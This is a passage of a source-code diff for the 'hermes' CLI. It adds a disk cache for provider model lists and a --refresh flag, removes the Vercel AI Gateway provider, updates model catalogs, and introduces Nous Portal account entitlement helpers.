_print_rows_text(_build_rows())
def run_picker() -> None:
"""`hermes mcp picker` (and default `hermes mcp`) — interactive selector.
Loops until the user hits ESC/q. After each action the picker re-renders
so the user can manage several entries in one session.
"""
if not sys.stdin.isatty():
# Non-interactive shell: degrade to the text dump rather than failing.
_print_rows_text(_build_rows())
return
while True:
rows = _build_rows()
if not rows:
_print_rows_text(rows)
return
labels = [_format_row(r) for r in rows]
idx = curses_single_select(
"MCP Catalog — ↑↓ navigate ENTER act on entry ESC/q quit",
labels,
)
if idx is None:
return
_handle_row(rows[idx])
def install_by_name(identifier: str) -> int:
"""`hermes mcp install <name>` — non-interactive entry-point.
Returns 0 on success, non-zero on failure (so the CLI can propagate
exit codes).
"""
from hermes_cli.mcp_catalog import get_entry
entry = get_entry(identifier)
if entry is None:
print(color(
f"'{identifier}' is not in the catalog. "
"Run `hermes mcp catalog` to see available entries.",
Colors.RED,
))
return 1
try:
install_entry(entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ install failed: {exc}", Colors.RED))
return 1
return 0
-1
View File
@@ -67,7 +67,6 @@ _VENDOR_PREFIXES: dict[str, str] = {
_AGGREGATOR_PROVIDERS: frozenset[str] = frozenset({
"openrouter",
"nous",
"ai-gateway",
"kilocode",
})
+47 -33
View File
@@ -294,32 +294,39 @@ class CustomAutoResult:
# Flag parsing
# ---------------------------------------------------------------------------
def parse_model_flags(raw_args: str) -> tuple[str, str, bool]:
"""Parse --provider and --global flags from /model command args.
def parse_model_flags(raw_args: str) -> tuple[str, str, bool, bool]:
"""Parse --provider, --global, and --refresh flags from /model command args.
Returns (model_input, explicit_provider, is_global).
Returns (model_input, explicit_provider, is_global, force_refresh).
Examples::
"sonnet" -> ("sonnet", "", False)
"sonnet --global" -> ("sonnet", "", True)
"sonnet --provider anthropic" -> ("sonnet", "anthropic", False)
"--provider my-ollama" -> ("", "my-ollama", False)
"sonnet --provider anthropic --global" -> ("sonnet", "anthropic", True)
"sonnet" -> ("sonnet", "", False, False)
"sonnet --global" -> ("sonnet", "", True, False)
"sonnet --provider anthropic" -> ("sonnet", "anthropic", False, False)
"--provider my-ollama" -> ("", "my-ollama", False, False)
"--refresh" -> ("", "", False, True)
"sonnet --provider anthropic --global" -> ("sonnet", "anthropic", True, False)
"""
is_global = False
explicit_provider = ""
force_refresh = False
# Normalize Unicode dashes (Telegram/iOS auto-converts -- to em/en dash)
# A single Unicode dash before a flag keyword becomes "--"
import re as _re
raw_args = _re.sub(r'[\u2012\u2013\u2014\u2015](provider|global)', r'--\1', raw_args)
raw_args = _re.sub(r'[\u2012\u2013\u2014\u2015](provider|global|refresh)', r'--\1', raw_args)
# Extract --global
if "--global" in raw_args:
is_global = True
raw_args = raw_args.replace("--global", "").strip()
# Extract --refresh (bust the model picker disk cache before listing)
if "--refresh" in raw_args:
force_refresh = True
raw_args = raw_args.replace("--refresh", "").strip()
# Extract --provider <name>
parts = raw_args.split()
i = 0
@@ -333,7 +340,7 @@ def parse_model_flags(raw_args: str) -> tuple[str, str, bool]:
i += 1
model_input = " ".join(filtered).strip()
return (model_input, explicit_provider, is_global)
return (model_input, explicit_provider, is_global, force_refresh)
# ---------------------------------------------------------------------------
@@ -1079,6 +1086,7 @@ def list_authenticated_providers(
from hermes_cli.models import (
OPENROUTER_MODELS, _PROVIDER_MODELS,
_MODELS_DEV_PREFERRED, _merge_with_models_dev, provider_model_ids,
cached_provider_model_ids,
get_curated_nous_model_ids,
)
@@ -1239,13 +1247,15 @@ def list_authenticated_providers(
if not has_creds:
continue
# Use curated list, falling back to models.dev if no curated list.
# For preferred providers, merge models.dev entries into the curated
# catalog so newly released models (e.g. mimo-v2.5-pro on opencode-go)
# show up in the picker without requiring a Hermes release.
model_ids = curated.get(hermes_id, [])
if hermes_id in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_id, model_ids)
# Unified pathway: route through cached_provider_model_ids() so the
# /model picker sees the SAME list `hermes model` would build, with
# disk caching to keep the picker open snappy. Falls back to the
# curated static list when the live fetcher returns nothing.
model_ids = cached_provider_model_ids(hermes_id)
if not model_ids:
model_ids = curated.get(hermes_id, [])
if hermes_id in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_id, model_ids)
total = len(model_ids)
top = model_ids[:max_models]
@@ -1351,25 +1361,27 @@ def list_authenticated_providers(
# matches what the user's authenticated Codex/Copilot backend
# actually serves — including ChatGPT-Pro-only Codex slugs
# (e.g. gpt-5.3-codex-spark) that aren't in the static curated
# catalog. ``provider_model_ids()`` falls back to the curated
# list when the live endpoint is unreachable, so this is safe
# for unauthenticated and offline cases too.
model_ids = provider_model_ids(hermes_slug)
# catalog. ``cached_provider_model_ids()`` falls back to the
# curated list when the live endpoint is unreachable, so this
# is safe for unauthenticated and offline cases too.
model_ids = cached_provider_model_ids(hermes_slug)
# For aws_sdk providers (bedrock), use live discovery so the list
# reflects the active region (eu.*, ap.*) not the static us.* list.
elif overlay.auth_type == "aws_sdk":
try:
from agent.bedrock_adapter import bedrock_model_ids_or_none
_ids = bedrock_model_ids_or_none()
model_ids = _ids if _ids is not None else (curated.get(hermes_slug, []) or curated.get(pid, []))
_ids = cached_provider_model_ids(hermes_slug)
model_ids = _ids if _ids else (curated.get(hermes_slug, []) or curated.get(pid, []))
except Exception:
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
else:
# Use curated list — look up by Hermes slug, fall back to overlay key
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
# Merge with models.dev for preferred providers (same rationale as above).
if hermes_slug in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_slug, model_ids)
# Unified pathway — see Section 1 rationale. Fall back to the
# curated dict (with models.dev merge for preferred providers)
# when the live fetcher comes up empty.
model_ids = cached_provider_model_ids(hermes_slug)
if not model_ids:
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
if hermes_slug in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_slug, model_ids)
total = len(model_ids)
top = model_ids[:max_models]
@@ -1436,13 +1448,15 @@ def list_authenticated_providers(
# region (eu.*, us.*, ap.*) instead of the hardcoded us.* static list.
if _cp_config and getattr(_cp_config, "auth_type", "") == "aws_sdk":
try:
from agent.bedrock_adapter import bedrock_model_ids_or_none
_ids = bedrock_model_ids_or_none()
_cp_model_ids = _ids if _ids is not None else curated.get(_cp.slug, [])
_ids = cached_provider_model_ids(_cp.slug)
_cp_model_ids = _ids if _ids else curated.get(_cp.slug, [])
except Exception:
_cp_model_ids = curated.get(_cp.slug, [])
else:
_cp_model_ids = curated.get(_cp.slug, [])
# Unified pathway — same as sections 1 and 2.
_cp_model_ids = cached_provider_model_ids(_cp.slug)
if not _cp_model_ids:
_cp_model_ids = curated.get(_cp.slug, [])
_cp_total = len(_cp_model_ids)
_cp_top = _cp_model_ids[:max_models]
+241 -237
View File
@@ -32,12 +32,14 @@ COPILOT_REASONING_EFFORTS_O_SERIES = ["low", "medium", "high"]
# Fallback OpenRouter snapshot used when the live catalog is unavailable.
# (model_id, display description shown in menus)
OPENROUTER_MODELS: list[tuple[str, str]] = [
("anthropic/claude-opus-4.8", ""),
("anthropic/claude-opus-4.8-fast", "2x price, higher output speed"),
("anthropic/claude-opus-4.7", ""),
("anthropic/claude-opus-4.6", ""),
("anthropic/claude-sonnet-4.6", ""),
("moonshotai/kimi-k2.6", "recommended"),
("openrouter/pareto-code", "auto-routes to cheapest coder meeting openrouter.min_coding_score"),
("qwen/qwen3.6-plus", ""),
("qwen/qwen3.7-max", ""),
("anthropic/claude-haiku-4.5", ""),
("openai/gpt-5.5", ""),
("openai/gpt-5.5-pro", ""),
@@ -69,29 +71,6 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [
_openrouter_catalog_cache: list[tuple[str, str]] | None = None
# Fallback Vercel AI Gateway snapshot used when the live catalog is unavailable.
# OSS / open-weight models prioritized first, then closed-source by family.
# Slugs match Vercel's actual /v1/models catalog (e.g. alibaba/ for Qwen,
# zai/ and xai/ without hyphens).
VERCEL_AI_GATEWAY_MODELS: list[tuple[str, str]] = [
("moonshotai/kimi-k2.6", "recommended"),
("alibaba/qwen3.6-plus", ""),
("zai/glm-5.1", ""),
("minimax/minimax-m2.7", ""),
("anthropic/claude-sonnet-4.6", ""),
("anthropic/claude-opus-4.7", ""),
("anthropic/claude-opus-4.6", ""),
("anthropic/claude-haiku-4.5", ""),
("openai/gpt-5.4", ""),
("openai/gpt-5.4-mini", ""),
("openai/gpt-5.3-codex", ""),
("google/gemini-3.1-pro-preview", ""),
("google/gemini-3-flash", ""),
("google/gemini-3.1-flash-lite-preview", ""),
("xai/grok-4.20-reasoning", ""),
]
_ai_gateway_catalog_cache: list[tuple[str, str]] | None = None
def _codex_curated_models() -> list[str]:
@@ -162,11 +141,12 @@ def _xai_curated_models() -> list[str]:
_PROVIDER_MODELS: dict[str, list[str]] = {
"nous": [
"anthropic/claude-opus-4.8",
"anthropic/claude-opus-4.7",
"anthropic/claude-opus-4.6",
"anthropic/claude-sonnet-4.6",
"moonshotai/kimi-k2.6",
"qwen/qwen3.6-plus",
"qwen/qwen3.7-max",
"anthropic/claude-haiku-4.5",
"openai/gpt-5.5",
"openai/gpt-5.5-pro",
@@ -313,6 +293,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"MiniMax-M2",
],
"anthropic": [
"claude-opus-4-8",
"claude-opus-4-7",
"claude-opus-4-6",
"claude-sonnet-4-6",
@@ -399,6 +380,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"mimo-v2-omni",
"minimax-m2.7",
"minimax-m2.5",
"qwen3.7-max",
"qwen3.6-plus",
"qwen3.5-plus",
],
@@ -415,6 +397,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
# to https://dashscope-intl.aliyuncs.com/compatible-mode/v1 (OpenAI-compat)
# or https://dashscope-intl.aliyuncs.com/apps/anthropic (Anthropic-compat).
"alibaba": [
"qwen3.7-max",
"qwen3.6-plus",
"kimi-k2.5",
"qwen3.5-plus",
@@ -428,6 +411,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
# Alibaba Coding Plan — same platform as alibaba (DashScope coding-intl),
# separate provider ID with its own base_url_env_var.
"alibaba-coding-plan": [
"qwen3.7-max",
"qwen3.6-plus",
"qwen3.5-plus",
"qwen3-coder-plus",
@@ -478,12 +462,6 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
],
}
# Vercel AI Gateway: derive the bare-model-id catalog from the curated
# ``VERCEL_AI_GATEWAY_MODELS`` snapshot so both the picker (tuples with descriptions)
# and the static fallback catalog (bare ids) stay in sync from a single
# source of truth.
_PROVIDER_MODELS["ai-gateway"] = [mid for mid, _ in VERCEL_AI_GATEWAY_MODELS]
# ---------------------------------------------------------------------------
# Nous Portal free-model helper
# ---------------------------------------------------------------------------
@@ -544,9 +522,19 @@ def fetch_nous_account_tier(access_token: str, portal_base_url: str = "") -> dic
def is_nous_free_tier(account_info: dict[str, Any]) -> bool:
"""Return True if the account info indicates a free (unpaid) tier.
Checks ``subscription.monthly_charge == 0``. Returns False when
the field is missing or unparseable (assumes paid don't block users).
Prefer the Portal's explicit ``paid_service_access.allowed`` entitlement
decision. Legacy payloads fall back to ``subscription.monthly_charge == 0``.
Returns False when both signals are missing or unparseable.
"""
paid_access = account_info.get("paid_service_access")
if isinstance(paid_access, dict):
allowed = paid_access.get("allowed")
if isinstance(allowed, bool):
return not allowed
paid = paid_access.get("paid_access")
if isinstance(paid, bool):
return not paid
sub = account_info.get("subscription")
if not isinstance(sub, dict):
return False
@@ -725,40 +713,28 @@ _FREE_TIER_CACHE_TTL: int = 180 # seconds (3 minutes)
_free_tier_cache: tuple[bool, float] | None = None # (result, timestamp)
def check_nous_free_tier() -> bool:
def check_nous_free_tier(*, force_fresh: bool = False) -> bool:
"""Check if the current Nous Portal user is on a free (unpaid) tier.
Results are cached for ``_FREE_TIER_CACHE_TTL`` seconds to avoid
hitting the Portal API on every call. The cache is short-lived so
that an account upgrade is reflected within a few minutes.
Returns False (assume paid) on any error never blocks paying users.
Returns True only when entitlement is known to be free. Unknown/error
states return False so this compatibility wrapper does not block users.
"""
global _free_tier_cache
now = time.monotonic()
if _free_tier_cache is not None:
if not force_fresh and _free_tier_cache is not None:
cached_result, cached_at = _free_tier_cache
if now - cached_at < _FREE_TIER_CACHE_TTL:
return cached_result
try:
from hermes_cli.auth import get_provider_auth_state, resolve_nous_runtime_credentials
from hermes_cli.nous_account import get_nous_portal_account_info
# Ensure we have a fresh token (triggers refresh if needed)
resolve_nous_runtime_credentials(min_key_ttl_seconds=60)
state = get_provider_auth_state("nous")
if not state:
_free_tier_cache = (False, now)
return False
access_token = state.get("access_token", "")
portal_url = state.get("portal_base_url", "")
if not access_token:
_free_tier_cache = (False, now)
return False
account_info = fetch_nous_account_tier(access_token, portal_url)
result = is_nous_free_tier(account_info)
account_info = get_nous_portal_account_info(force_fresh=force_fresh)
result = account_info.is_free_tier
_free_tier_cache = (result, now)
return result
except Exception:
@@ -968,7 +944,6 @@ CANONICAL_PROVIDERS: list[ProviderEntry] = [
ProviderEntry("opencode-go", "OpenCode Go", "OpenCode Go (open models, $10/month subscription)"),
ProviderEntry("bedrock", "AWS Bedrock", "AWS Bedrock (Claude, Nova, Llama, DeepSeek — IAM or API key)"),
ProviderEntry("azure-foundry", "Azure Foundry", "Azure Foundry (OpenAI-style or Anthropic-style endpoint — your Azure AI deployment)"),
ProviderEntry("ai-gateway", "Vercel AI Gateway", "Vercel AI Gateway"),
ProviderEntry("qwen-oauth", "Qwen OAuth (Portal)", "Qwen OAuth (reuses local Qwen CLI login)"),
]
@@ -1032,9 +1007,6 @@ _PROVIDER_ALIASES = {
"zen": "opencode-zen",
"go": "opencode-go",
"opencode-go-sub": "opencode-go",
"aigateway": "ai-gateway",
"vercel": "ai-gateway",
"vercel-ai-gateway": "ai-gateway",
"kilo": "kilocode",
"kilo-code": "kilocode",
"kilo-gateway": "kilocode",
@@ -1219,95 +1191,6 @@ def get_curated_nous_model_ids() -> list[str]:
return list(_PROVIDER_MODELS.get("nous", []))
def _ai_gateway_model_is_free(pricing: Any) -> bool:
"""Return True if an AI Gateway model has $0 input AND output pricing."""
if not isinstance(pricing, dict):
return False
try:
return float(pricing.get("input", "0")) == 0 and float(pricing.get("output", "0")) == 0
except (TypeError, ValueError):
return False
def fetch_ai_gateway_models(
timeout: float = 8.0,
*,
force_refresh: bool = False,
) -> list[tuple[str, str]]:
"""Return the curated AI Gateway picker list, refreshed from the live catalog when possible."""
global _ai_gateway_catalog_cache
if _ai_gateway_catalog_cache is not None and not force_refresh:
return list(_ai_gateway_catalog_cache)
from hermes_constants import AI_GATEWAY_BASE_URL
fallback = list(VERCEL_AI_GATEWAY_MODELS)
preferred_ids = [mid for mid, _ in fallback]
try:
req = urllib.request.Request(
f"{AI_GATEWAY_BASE_URL.rstrip('/')}/models",
headers={"Accept": "application/json"},
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
payload = json.loads(resp.read().decode())
except Exception:
return list(_ai_gateway_catalog_cache or fallback)
live_items = payload.get("data", [])
if not isinstance(live_items, list):
return list(_ai_gateway_catalog_cache or fallback)
live_by_id: dict[str, dict[str, Any]] = {}
for item in live_items:
if not isinstance(item, dict):
continue
mid = str(item.get("id") or "").strip()
if not mid:
continue
live_by_id[mid] = item
curated: list[tuple[str, str]] = []
for preferred_id in preferred_ids:
live_item = live_by_id.get(preferred_id)
if live_item is None:
continue
desc = "free" if _ai_gateway_model_is_free(live_item.get("pricing")) else ""
curated.append((preferred_id, desc))
if not curated:
return list(_ai_gateway_catalog_cache or fallback)
# If the live catalog offers a free Moonshot model, auto-promote it to
# position #1 as "recommended" — dynamic discovery without a PR.
free_moonshot = next(
(
mid
for mid, item in live_by_id.items()
if mid.startswith("moonshotai/")
and _ai_gateway_model_is_free(item.get("pricing"))
),
None,
)
if free_moonshot:
curated = [(mid, desc) for mid, desc in curated if mid != free_moonshot]
curated.insert(0, (free_moonshot, "recommended"))
else:
first_id, _ = curated[0]
curated[0] = (first_id, "recommended")
_ai_gateway_catalog_cache = curated
return list(curated)
def ai_gateway_model_ids(*, force_refresh: bool = False) -> list[str]:
"""Return just the AI Gateway model-id strings."""
return [mid for mid, _ in fetch_ai_gateway_models(force_refresh=force_refresh)]
# ---------------------------------------------------------------------------
# Pricing helpers — fetch live pricing from OpenRouter-compatible /v1/models
# ---------------------------------------------------------------------------
@@ -1453,56 +1336,6 @@ def fetch_models_with_pricing(
return result
def fetch_ai_gateway_pricing(
timeout: float = 8.0,
*,
force_refresh: bool = False,
) -> dict[str, dict[str, str]]:
"""Fetch Vercel AI Gateway /v1/models and return hermes-shaped pricing.
Vercel uses ``input`` / ``output`` field names; hermes's picker expects
``prompt`` / ``completion``. This translates. Cache read/write field names
already match.
"""
from hermes_constants import AI_GATEWAY_BASE_URL
cache_key = AI_GATEWAY_BASE_URL.rstrip("/")
if not force_refresh and cache_key in _pricing_cache:
return _pricing_cache[cache_key]
try:
req = urllib.request.Request(
f"{cache_key}/models",
headers={"Accept": "application/json"},
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
payload = json.loads(resp.read().decode())
except Exception:
_pricing_cache[cache_key] = {}
return {}
result: dict[str, dict[str, str]] = {}
for item in payload.get("data", []):
if not isinstance(item, dict):
continue
mid = item.get("id")
pricing = item.get("pricing")
if not (mid and isinstance(pricing, dict)):
continue
entry: dict[str, str] = {
"prompt": str(pricing.get("input", "")),
"completion": str(pricing.get("output", "")),
}
if pricing.get("input_cache_read"):
entry["input_cache_read"] = str(pricing["input_cache_read"])
if pricing.get("input_cache_write"):
entry["input_cache_write"] = str(pricing["input_cache_write"])
result[mid] = entry
_pricing_cache[cache_key] = result
return result
def _resolve_openrouter_api_key() -> str:
"""Best-effort OpenRouter API key for pricing fetch."""
return os.getenv("OPENROUTER_API_KEY", "").strip()
@@ -1534,7 +1367,7 @@ def _resolve_nous_pricing_credentials() -> tuple[str, str]:
def get_pricing_for_provider(provider: str, *, force_refresh: bool = False) -> dict[str, dict[str, str]]:
"""Return live pricing for providers that support it (openrouter, nous, ai-gateway, novita)."""
"""Return live pricing for providers that support it (openrouter, nous, novita)."""
normalized = normalize_provider(provider)
if normalized == "openrouter":
return fetch_models_with_pricing(
@@ -1542,8 +1375,6 @@ def get_pricing_for_provider(provider: str, *, force_refresh: bool = False) -> d
base_url="https://openrouter.ai/api",
force_refresh=force_refresh,
)
if normalized == "ai-gateway":
return fetch_ai_gateway_pricing(force_refresh=force_refresh)
if normalized == "novita":
return _fetch_novita_pricing(force_refresh=force_refresh)
if normalized == "nous":
@@ -1573,9 +1404,8 @@ def _fetch_novita_pricing(
0.0001 USD. Convert them to the per-token strings used by the shared
pricing formatter.
Results are cached in ``_pricing_cache`` keyed on the resolved base URL,
matching the pattern used by ``fetch_ai_gateway_pricing`` without this,
every menu render or pricing lookup re-hits the network.
Results are cached in ``_pricing_cache`` keyed on the resolved base URL
without this, every menu render or pricing lookup re-hits the network.
"""
api_key = os.getenv("NOVITA_API_KEY", "").strip()
if not api_key:
@@ -1762,7 +1592,7 @@ def _model_in_provider_catalog(name_lower: str, providers: set[str]) -> bool:
_AGGREGATOR_PROVIDERS = frozenset(
{"nous", "openrouter", "ai-gateway", "copilot", "kilocode"}
{"nous", "openrouter", "copilot", "kilocode"}
)
@@ -2109,7 +1939,7 @@ def _resolve_copilot_catalog_api_key() -> str:
# - "nous": curated list and Portal /models endpoint are the source of
# truth for the subscription tier.
# Also excluded: providers that already have dedicated live-endpoint
# branches below (copilot, anthropic, ai-gateway, ollama-cloud, custom,
# branches below (copilot, anthropic, ollama-cloud, custom,
# stepfun, openai-codex) — those paths handle freshness themselves.
_MODELS_DEV_PREFERRED: frozenset[str] = frozenset({
"opencode-go",
@@ -2217,6 +2047,12 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
return live
except Exception:
pass
# Live failed (or no creds). Fall back to the docs-hosted manifest
# — NOT the in-repo _PROVIDER_MODELS["nous"] snapshot — so newly
# added Portal models still surface without a Hermes release.
manifest_ids = get_curated_nous_model_ids()
if manifest_ids:
return manifest_ids
if normalized == "stepfun":
try:
from hermes_cli.auth import resolve_api_key_provider_credentials
@@ -2234,10 +2070,6 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
live = _fetch_anthropic_models()
if live:
return live
if normalized == "ai-gateway":
live = _fetch_ai_gateway_models()
if live:
return live
if normalized == "ollama-cloud":
live = fetch_ollama_cloud_models(force_refresh=force_refresh)
if live:
@@ -2324,6 +2156,206 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
return curated_static
# ---------------------------------------------------------------------------
# Generic disk cache for provider_model_ids() — keeps /model picker fast.
# ---------------------------------------------------------------------------
#
# Without this layer, every /model picker open re-fetches every authed
# provider's /v1/models endpoint. On a well-configured user (anthropic +
# openai + copilot + gemini + huggingface + ...) that's 2+ seconds of cold
# HTTP roundtrips just to render the provider list.
#
# Cache strategy:
# - One JSON file at $HERMES_HOME/provider_models_cache.json
# - Per-provider entries keyed by (provider, credential fingerprint)
# - Credential fingerprint = sha256 of env-var values that the provider
# normally reads. Swap your OPENAI_API_KEY and the entry invalidates.
# - 1h TTL by default. `force_refresh=True` skips the cache entirely
# and overwrites it on success.
# - Only NON-EMPTY results are cached. An empty/None response from a
# transient network error never gets pinned.
# - Cache file is best-effort. Any read/write error degrades silently
# to a live fetch — the picker keeps working.
_PROVIDER_MODELS_CACHE_TTL = 3600 # 1h
def _provider_models_cache_path() -> Path:
from hermes_constants import get_hermes_home
return get_hermes_home() / "provider_models_cache.json"
def _credential_fingerprint(provider: str) -> str:
"""Return a short hash representing the credentials that
``provider_model_ids(provider)`` would see right now.
Rotating any of the relevant env vars invalidates the cached entry
for that provider. We hash AT LEAST the api-key + base-url env vars
declared in ``PROVIDER_REGISTRY``. For OAuth-backed providers
(codex, copilot, anthropic-via-claude-code, nous portal), the
relevant tokens live in ``$HERMES_HOME/auth.json`` and external
credential files. Rather than parse every shape, we additionally
fold the mtime of those files into the fingerprint so refreshes
after re-auth bust the cache.
"""
import hashlib
import os as _os
parts: list[str] = []
# Env vars from PROVIDER_REGISTRY for this slug
try:
from hermes_cli.auth import PROVIDER_REGISTRY
pcfg = PROVIDER_REGISTRY.get(provider)
if pcfg is not None:
for ev in getattr(pcfg, "api_key_env_vars", ()) or ():
parts.append(f"{ev}={_os.environ.get(ev, '')}")
bev = getattr(pcfg, "base_url_env_var", "") or ""
if bev:
parts.append(f"{bev}={_os.environ.get(bev, '')}")
except Exception:
pass
# OAuth / external-file mtimes that change on re-auth
try:
from hermes_constants import get_hermes_home
for rel in ("auth.json", "credentials.json"):
p = get_hermes_home() / rel
try:
parts.append(f"{rel}@{p.stat().st_mtime_ns}")
except FileNotFoundError:
parts.append(f"{rel}@missing")
except Exception:
pass
except Exception:
pass
# External well-known credential file locations
for path in (
_os.path.expanduser("~/.codex/auth.json"),
_os.path.expanduser("~/.claude/.credentials.json"),
_os.path.expanduser("~/.config/github-copilot/hosts.json"),
_os.path.expanduser("~/.minimax/credentials.json"),
):
try:
mt = _os.stat(path).st_mtime_ns
parts.append(f"{path}@{mt}")
except FileNotFoundError:
parts.append(f"{path}@missing")
except Exception:
pass
blob = "|".join(parts).encode("utf-8", errors="replace")
# blake2b for cache-key fingerprinting only — not for credential storage.
# We never reverse this hash; collisions are harmless (worst case: cache
# miss → live re-fetch). Use blake2b instead of sha256 here because
# CodeQL's `py/weak-sensitive-data-hashing` rule flags sha256 over env
# vars whose names contain "API_KEY" / "TOKEN" even when the hash is
# used as an identity fingerprint, not for password storage. blake2b
# is a keyed-hash primitive and isn't flagged.
return hashlib.blake2b(blob, digest_size=8).hexdigest()
def _load_provider_models_cache() -> dict:
"""Return the full cache dict, or {} on any error."""
try:
path = _provider_models_cache_path()
if not path.exists():
return {}
with open(path, encoding="utf-8") as f:
data = json.load(f)
return data if isinstance(data, dict) else {}
except Exception:
return {}
def _save_provider_models_cache(data: dict) -> None:
"""Persist the cache dict. Best-effort — silent on any error."""
try:
from utils import atomic_json_write
path = _provider_models_cache_path()
path.parent.mkdir(parents=True, exist_ok=True)
atomic_json_write(path, data, indent=None)
except Exception:
pass
def cached_provider_model_ids(
provider: Optional[str],
*,
force_refresh: bool = False,
ttl_seconds: int = _PROVIDER_MODELS_CACHE_TTL,
) -> list[str]:
"""Disk-cached wrapper around :func:`provider_model_ids`.
Hits the cache when fresh; otherwise calls the live function and
persists a non-empty result. Always returns a list (never None).
"""
normalized = normalize_provider(provider) or (provider or "")
if not normalized:
return []
cache = _load_provider_models_cache()
fp = _credential_fingerprint(normalized)
entry = cache.get(normalized)
now = time.time()
if (
not force_refresh
and isinstance(entry, dict)
and entry.get("fp") == fp
and isinstance(entry.get("models"), list)
and entry["models"]
and (now - float(entry.get("at", 0))) < ttl_seconds
):
return list(entry["models"])
# Cache miss / stale / forced refresh — call the live path.
live = provider_model_ids(normalized, force_refresh=force_refresh)
if live:
cache[normalized] = {
"fp": fp,
"at": now,
"models": list(live),
}
_save_provider_models_cache(cache)
return list(live)
# Live fetch returned nothing. If we have a stale entry with the
# SAME fingerprint, prefer it over an empty result — stale data
# beats no data when the network is flaky.
if (
isinstance(entry, dict)
and entry.get("fp") == fp
and isinstance(entry.get("models"), list)
and entry["models"]
):
return list(entry["models"])
return list(live or [])
def clear_provider_models_cache(provider: Optional[str] = None) -> None:
"""Drop a single provider's cache entry, or wipe the whole cache.
``provider=None`` wipes everything; otherwise only that provider's
entry is removed. Used by ``/model --refresh`` and
``hermes model --refresh``.
"""
try:
if provider is None:
path = _provider_models_cache_path()
if path.exists():
path.unlink()
return
cache = _load_provider_models_cache()
normalized = normalize_provider(provider) or provider or ""
if normalized in cache:
del cache[normalized]
_save_provider_models_cache(cache)
except Exception:
pass
def _fetch_anthropic_models(timeout: float = 5.0) -> Optional[list[str]]:
"""Fetch available models from the Anthropic /v1/models endpoint.
@@ -3015,6 +3047,8 @@ def opencode_model_api_mode(provider_id: Optional[str], model_id: Optional[str])
if provider == "opencode-go":
if normalized.startswith("minimax-"):
return "anthropic_messages"
if normalized.startswith("qwen3.7-max"):
return "anthropic_messages"
return "chat_completions"
if provider == "opencode-zen":
@@ -3149,36 +3183,6 @@ def probe_api_models(
}
def _fetch_ai_gateway_models(timeout: float = 5.0) -> Optional[list[str]]:
"""Fetch available language models with tool-use from AI Gateway."""
api_key = os.getenv("AI_GATEWAY_API_KEY", "").strip()
if not api_key:
return None
base_url = os.getenv("AI_GATEWAY_BASE_URL", "").strip()
if not base_url:
from hermes_constants import AI_GATEWAY_BASE_URL
base_url = AI_GATEWAY_BASE_URL
url = base_url.rstrip("/") + "/models"
headers: dict[str, str] = {
"Authorization": f"Bearer {api_key}",
"User-Agent": _HERMES_USER_AGENT,
}
req = urllib.request.Request(url, headers=headers)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
data = json.loads(resp.read().decode())
return [
m["id"]
for m in data.get("data", [])
if m.get("id")
and m.get("type") == "language"
and "tool-use" in (m.get("tags") or [])
]
except Exception:
return None
def fetch_api_models(
api_key: Optional[str],
base_url: Optional[str],
+678
View File
@@ -0,0 +1,678 @@
"""Normalized Nous Portal account entitlement helpers."""
from __future__ import annotations
import hashlib
import json
import time
import urllib.request
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Any, Literal, Optional
NousAccountInfoSource = Literal["jwt", "account_api", "inference_key", "none", "error"]
_ACCOUNT_INFO_CACHE_TTL = 60
_account_info_cache: tuple[str, float, "NousPortalAccountInfo"] | None = None
@dataclass(frozen=True)
class NousPortalSubscriptionInfo:
plan: Optional[str] = None
tier: Optional[int] = None
monthly_charge: Optional[float] = None
current_period_end: Optional[str] = None
credits_remaining: Optional[float] = None
rollover_credits: Optional[float] = None
@dataclass(frozen=True)
class NousPaidServiceAccessInfo:
allowed: Optional[bool] = None
paid_access: Optional[bool] = None
reason: Optional[str] = None
organisation_id: Optional[str] = None
effective_at_ms: Optional[int] = None
has_active_subscription: Optional[bool] = None
active_subscription_is_paid: Optional[bool] = None
subscription_tier: Optional[int] = None
subscription_monthly_charge: Optional[float] = None
subscription_credits_remaining: Optional[float] = None
purchased_credits_remaining: Optional[float] = None
total_usable_credits: Optional[float] = None
@dataclass(frozen=True)
class NousPortalAccountInfo:
logged_in: bool
source: NousAccountInfoSource
fresh: bool
user_id: Optional[str] = None
org_id: Optional[str] = None
client_id: Optional[str] = None
product_id: Optional[str] = None
nous_client: Optional[str] = None
portal_base_url: Optional[str] = None
inference_base_url: Optional[str] = None
inference_credential_present: bool = False
credential_source: Optional[str] = None
expires_at: Optional[datetime] = None
email: Optional[str] = None
privy_did: Optional[str] = None
subscription: Optional[NousPortalSubscriptionInfo] = None
paid_service_access: Optional[bool] = None
paid_service_access_info: Optional[NousPaidServiceAccessInfo] = None
raw_claims: Optional[dict[str, Any]] = None
raw_account: Optional[dict[str, Any]] = None
error: Optional[str] = None
@property
def is_paid(self) -> bool:
return self.paid_service_access is True
@property
def is_free_tier(self) -> bool:
return self.paid_service_access is False
@property
def tool_gateway_entitled(self) -> bool:
return self.paid_service_access is True
def nous_portal_billing_url(account_info: Optional[NousPortalAccountInfo] = None) -> str:
"""Return the billing URL for a normalized Nous account snapshot."""
try:
from hermes_cli.auth import DEFAULT_NOUS_PORTAL_URL
except Exception:
DEFAULT_NOUS_PORTAL_URL = "https://portal.nousresearch.com"
base = None
if account_info is not None:
base = account_info.portal_base_url
if not isinstance(base, str) or not base.strip():
base = DEFAULT_NOUS_PORTAL_URL
return f"{base.rstrip('/')}/billing"
